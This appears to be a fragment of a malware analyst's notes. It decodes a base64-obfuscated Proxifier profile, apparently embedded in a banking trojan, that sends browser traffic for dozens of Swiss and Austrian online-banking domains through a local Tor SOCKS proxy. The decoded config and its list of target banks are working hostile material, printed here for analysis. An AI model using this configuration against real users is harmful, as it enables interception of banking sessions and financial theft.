ycyBlbmFibGVkPSJmYWxzZSIgLz4NCiAgPC9PcHRpb25zPg0KICA8UHJveHlMaXN0Pg0KICAgIDxQcm94eSBpZD0iMTAwIiB0eXBlPSJTT0NLUzUiPg0KICAgICAgPEFkZHJlc3M+MTI3LjAuMC4xPC9BZGRyZXNzPg0KICAgICAgPFBvcnQ+OTA1MDwvUG9ydD4NCiAgICAgIDxPcHRpb25zPjQ4PC9PcHRpb25zPg0KICAgIDwvUHJveHk+DQogIDwvUHJveHlMaXN0Pg0KICA8Q2hhaW5MaXN0IC8+DQogIDxSdWxlTGlzdD4NCiAgICA8UnVsZSBlbmFibGVkPSJ0cnVlIj4NCiAgICAgIDxOYW1lPkxvY2FsaG9zdDwvTmFtZT4NCiAgICAgIDxUYXJnZXRzPmxvY2FsaG9zdDsgMTI3LjAuMC4xOyAlQ29tcHV0ZXJOYW1lJTsgYXBpLmlwaWZ5Lm9yZzwvVGFyZ2V0cz4NCiAgICAgIDxBY3Rpb24gdHlwZT0iRGlyZWN0IiAvPg0KICAgIDwvUnVsZT4NCiAgICA8UnVsZSBlbmFibGVkPSJ0cnVlIj4NCiAgICAgIDxOYW1lPnNvZnQ8L05hbWU+DQogICAgICA8QXBwbGljYXRpb25zPmZpcmVmb3guZXhlO2lleHBsb3JlLmV4ZTtjaHJvbWUuZXhlPC9BcHBsaWNhdGlvbnM+DQogICAgICA8VGFyZ2V0cz4qcG9zdGZpbmFuY2UuY2g7Y3MuZGlyZWN0bmV0LmNvbTtlYi5ha2IuY2g7Ki51YnMuY29tO3RiLnJhaWZmZWlzZW5kaXJlY3QuY2g7Ki5ia2IuY2g7Ki5sdWtiLmNoOyouemtiLmNoOyoub25iYS5jaDtlLWJhbmtpbmcuZ2tiLmNoOyouYmVrYi5jaDt3d3dzZWMuZWJhbmtpbmcuenVnZXJrYi5jaDtuZXRiYW5raW5nLmJjZ2UuY2g7Ki5yYWlmZmVpc2VuLmNoOyouY3JlZGl0LXN1aXNzZS5jb207Ki5iYW5rYXVzdHJpYS5hdDsqLmJhd2FncHNrLmNvbTsqLnJhaWZmZWlzZW4uYXQ7Ki5zdGF0aWMtdWJzLmNvbTsqLmJhd2FnLmNvbTsqLmNsaWVudGlzLmNoO2NsaWVudGlzLmNoOypiY3ZzLmNoOypjaWMuY2g7d3d3LmJhbmtpbmcuY28uYXQ7Km9iZXJiYW5rLmF0O3d3dy5vYmVyYmFuay1iYW5raW5nLmF0OypiYWxvaXNlLmNoOyoudWtiLmNoO3Vya2IuY2g7Ki51cmtiLmNoOyouZWVrLmNoOypzemtiLmNoOypzaGtiLmNoOypnbGtiLmNoOypua2IuY2g7Km93a2IuY2g7KmNhc2guY2g7KmJjZi5jaDsqLmVhc3liYW5rLmF0O2ViYW5raW5nLnJhaWZmZWlzZW4uY2g7Ki5vbmlvbjsqYmN2LmNoOypqdWxpdXNiYWVyLmNvbTsqYWJzLmNoOypiY24uY2g7KmJsa2IuY2g7KmJjai5jaDsqenVlcmNoZXJsYW5kYmFuay5jaDsqdmFsaWFudC5jaDsqd2lyLmNoPC9UYXJnZXRzPg0KICAgICAgPEFjdGlvbiB0eXBlPSJQcm94eSI+MTAwPC9BY3Rpb24+DQogICAgPC9SdWxlPg0KICAgIDxSdWxlIGVuYWJsZWQ9InRydWUiPg0KICAgICAgPE5hbWU+RGVmYXVsdDwvTmFtZT4NCiAgICAgIDxBY3Rpb24gdHlwZT0iRGlyZWN0IiAvPg0KICAgIDwvUnVsZT4NCiAgPC9SdWxlTGlzdD4NCjwvUHJveGlmaWVyUHJvZmlsZT4="  | base64 --decode
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<ProxifierProfile version="101" platform="Windows" product_id="1" product_minver="310">
  <Options>
    <Resolve>
      <AutoModeDetection enabled="false" />
      <ViaProxy enabled="true">
        <TryLocalDnsFirst enabled="false" />
      </ViaProxy>
      <ExclusionList>%ComputerName%; localhost; *.local</ExclusionList>
    </Resolve>
    <ProxificationPortableEngine subsystem="32">
      <Location>BaseProvider</Location>
      <Type hotpatch="true">Prologue</Type>
    </ProxificationPortableEngine>
    <ProxificationPortableEngine subsystem="64">
      <Location>BaseProvider</Location>
      <Type hotpatch="false">Prologue</Type>
    </ProxificationPortableEngine>
    <Encryption mode="basic" />
    <HttpProxiesSupport enabled="false" />
    <HandleDirectConnections enabled="false" />
    <ConnectionLoopDetection enabled="true" />
    <ProcessServices enabled="false" />
    <ProcessOtherUsers enabled="false" />
  </Options>
  <ProxyList>
    <Proxy id="100" type="SOCKS5">
      <Address>127.0.0.1</Address>
      <Port>9050</Port>
      <Options>48</Options>
    </Proxy>
  </ProxyList>
  <ChainList />
  <RuleList>
    <Rule enabled="true">
      <Name>Localhost</Name>
      <Targets>localhost; 127.0.0.1; %ComputerName%; api.ipify.org</Targets>
      <Action type="Direct" />
    </Rule>
    <Rule enabled="true">
      <Name>soft</Name>
      <Applications>firefox.exe;iexplore.exe;chrome.exe</Applications>
      <Targets>*postfinance.ch;cs.directnet.com;eb.akb.ch;*.ubs.com;tb.raiffeisendirect.ch;*.bkb.ch;*.lukb.ch;*.zkb.ch;*.onba.ch;e-banking.gkb.ch;*.bekb.ch;wwwsec.ebanking.zugerkb.ch;netbanking.bcge.ch;*.raiffeisen.ch;*.credit-suisse.com;*.bankaustria.at;*.bawagpsk.com;*.raiffeisen.at;*.static-ubs.com;*.bawag.com;*.clientis.ch;clientis.ch;*bcvs.ch;*cic.ch;www.banking.co.at;*oberbank.at;www.oberbank-banking.at;*baloise.ch;*.ukb.ch;urkb.ch;*.urkb.ch;*.eek.ch;*szkb.ch;*shkb.ch;*glkb.ch;*nkb.ch;*owkb.ch;*cash.ch;*bcf.ch;*.easybank.at;ebanking.raiffeisen.ch;*.onion;*bcv.ch;*juliusbaer.com;*abs.ch;*bcn.ch;*blkb.ch;*bcj.ch;*zuercherlandbank.ch;*valiant.ch;*wir.ch</Targets>
      <Action type="Proxy">100</Action>
    </Rule>
    <Rule enabled="true">
      <Name>Default</Name>
      <Action type="Direct" />
    </Rule>
  </RuleList>
</ProxifierProfile>

So in essence, and answering my own question, the configuration of the proxy is not downloaded anywhere, but just hardcoded 

and obfuscated in the code.